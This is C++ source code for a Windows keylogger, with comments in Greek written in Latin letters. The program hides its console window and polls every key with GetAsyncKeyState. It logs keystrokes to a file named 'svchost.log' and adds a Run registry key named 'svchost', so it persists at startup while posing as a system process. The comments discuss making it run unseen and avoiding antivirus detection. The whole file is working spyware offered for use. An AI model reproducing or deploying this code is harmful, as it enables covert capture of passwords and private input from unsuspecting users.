C++ Code1

1. #include <windows.h>
2. #include <stdio.h>
3. #include <winuser.h>
4. #include <windowsx.h>
5. #include <time.h>
6.  
7. #define BUFSIZE 80
8.  
9. int test_key(void);
10. int create_key(char *);
11. int get_keys(void);
12.  
13. int main(void)
14. {
15. // to apotelesma vgainei se ena shmeiwmatario me onoma "svchost" sthn idia dief8unsh me to arxeio .exe
16. // an vgaleis apo tis 4 parakatw grammes tis "//", to programma 8a leitourgei 'upogeia', dhladh *den* 8a fainetai
17. // san para8uraki, alla merika antivirus to antimetwpizoun etsi san io...
18. // opote tis afhnw etsi pros to paron
19. HWND stealth; /*creating stealth (window is not visible)*/
20. AllocConsole();
21. stealth=FindWindowA("ConsoleWindowClass",NULL);
22. ShowWindow(stealth,0);
23.  
24. int test,create;
25. test=test_key();/*check if key is available for opening*/
26.  
27. if (test==2)/*create key*/
28. {
29. char *path="c:\\%windir%\\svchost.exe";/*the path in which the file needs to be*/
30. create=create_key(path);
31.  
32. }
33.  
34.  
35. int t=get_keys();
36.  
37. return t;
38. }
39.  
40. int get_keys(void)
41. {
42. short character;
43. while(1)
44. {
45. // dn nomizw na uparxei kapoio provlhma edw, h entolh afth tou leei na mhn diavazei xarakthres
46. // pou apexoun 10miliseconds... dhladh an patas ena gramma san jjjjjjjjjjjjjjjjjjjjjjjjjjjjj
47. // mporei na mhn ta diavazei ola... opote h svhse afthn thn entolh, h kane to Sleep(10) --> Sleep(1)
48. //Sleep(10);/*to prevent 100% cpu usage*/
49. for(character=8;character<=222;character++)
50. {
51. if(GetAsyncKeyState(character)==-32767)
52. {
53.  
54. FILE *file;
55. file=fopen("svchost.log","a+");
56. if(file==NULL)
57. {
58. return 1;
59. }
60. if(file!=NULL)
61. {
62. if((character>=39)&&(character<=64))
63. {
64. fputc(character,file);
65. fclose(file);
66. break;
67. }
68. else if((character>64)&&(character<91))
69. {
70. character+=32;
71. fputc(character,file);
72. fclose(file);
73. break;
74. }
75. else
76. {
77. switch(character)
78. {
79. case VK_SPACE:
80. fputc(' ',file);
81. fclose(file);
82. break;
83. case VK_SHIFT:
84. fputs("[SHIFT]",file);
85. fclose(file);
86. break;
87. case VK_RETURN:
88. fputs("\n[ENTER]",file);
89. fclose(file);
90. break;
91. case VK_BACK:
92. fputs("[BACKSPACE]",file);
93. fclose(file);
94. break;
95. case VK_TAB:
96. fputs("[TAB]",file);
97. fclose(file);
98. break;
99. case VK_CONTROL:
100. fputs("[CTRL]",file);
101. fclose(file);
102. break;
103. case VK_DELETE:
104. fputs("[DEL]",file);
105. fclose(file);
106. break;
107. case VK_OEM_1:
108. fputs("[;:]",file);
109. fclose(file);
110. break;
111. case VK_OEM_2:
112. fputs("[/?]",file);
113. fclose(file);
114. break;
115. case VK_OEM_3:
116. fputs("[`~]",file);
117. fclose(file);
118. break;
119. case VK_OEM_4:
120. fputs("[ [{ ]",file);
121. fclose(file);
122. break;
123. case VK_OEM_5:
124. fputs("[\\|]",file);
125. fclose(file);
126. break;
127. case VK_OEM_6:
128. fputs("[ ]} ]",file);
129. fclose(file);
130. break;
131. case VK_OEM_7:
132. fputs("['\"]",file);
133. fclose(file);
134. break;
135. /*case VK_OEM_PLUS:
136. fputc('+',file);
137. fclose(file);
138. break;
139. case VK_OEM_COMMA:
140. fputc(',',file);
141. fclose(file);
142. break;
143. case VK_OEM_MINUS:
144. fputc('-',file);
145. fclose(file);
146. break;
147. case VK_OEM_PERIOD:
148. fputc('.',file);
149. fclose(file);
150. break;*/
151. case VK_NUMPAD0:
152. fputc('0',file);
153. fclose(file);
154. break;
155. case VK_NUMPAD1:
156. fputc('1',file);
157. fclose(file);
158. break;
159. case VK_NUMPAD2:
160. fputc('2',file);
161. fclose(file);
162. break;
163. case VK_NUMPAD3:
164. fputc('3',file);
165. fclose(file);
166. break;
167. case VK_NUMPAD4:
168. fputc('4',file);
169. fclose(file);
170. break;
171. case VK_NUMPAD5:
172. fputc('5',file);
173. fclose(file);
174. break;
175. case VK_NUMPAD6:
176. fputc('6',file);
177. fclose(file);
178. break;
179. case VK_NUMPAD7:
180. fputc('7',file);
181. fclose(file);
182. break;
183. case VK_NUMPAD8:
184. fputc('8',file);
185. fclose(file);
186. break;
187. case VK_NUMPAD9:
188. fputc('9',file);
189. fclose(file);
190. break;
191. case VK_CAPITAL:
192. fputs("[CAPS LOCK]",file);
193. fclose(file);
194. break;
195. default:
196. fclose(file);
197. break;
198. }
199. }
200. }
201. }
202. }
203.  
204. }
205. return EXIT_SUCCESS;
206. }
207.  
208. int test_key(void)
209. {
210. int check;
211. HKEY hKey;
212. char path[BUFSIZE];
213. DWORD buf_length=BUFSIZE;
214. int reg_key;
215.  
216. reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);
217. if(reg_key!=0)
218. {
219. check=1;
220. return check;
221. }
222.  
223. reg_key=RegQueryValueEx(hKey,"svchost",NULL,NULL,(LPBYTE)path,&buf_length);
224.  
225. if((reg_key!=0)||(buf_length>BUFSIZE))
226. check=2;
227. if(reg_key==0)
228. check=0;
229.  
230. RegCloseKey(hKey);
231. return check;
232. }
233.  
234. int create_key(char *path)
235. {
236. int reg_key,check;
237.  
238. HKEY hkey;
239.  
240. reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
241. if(reg_key==0)
242. {
243. RegSetValueEx((HKEY)hkey,"svchost",0,REG_SZ,(BYTE *)path,strlen(path));
244. check=0;
245. return check;
246. }
247. if(reg_key!=0)
248. check=1;
249.  
250. return check;
251. }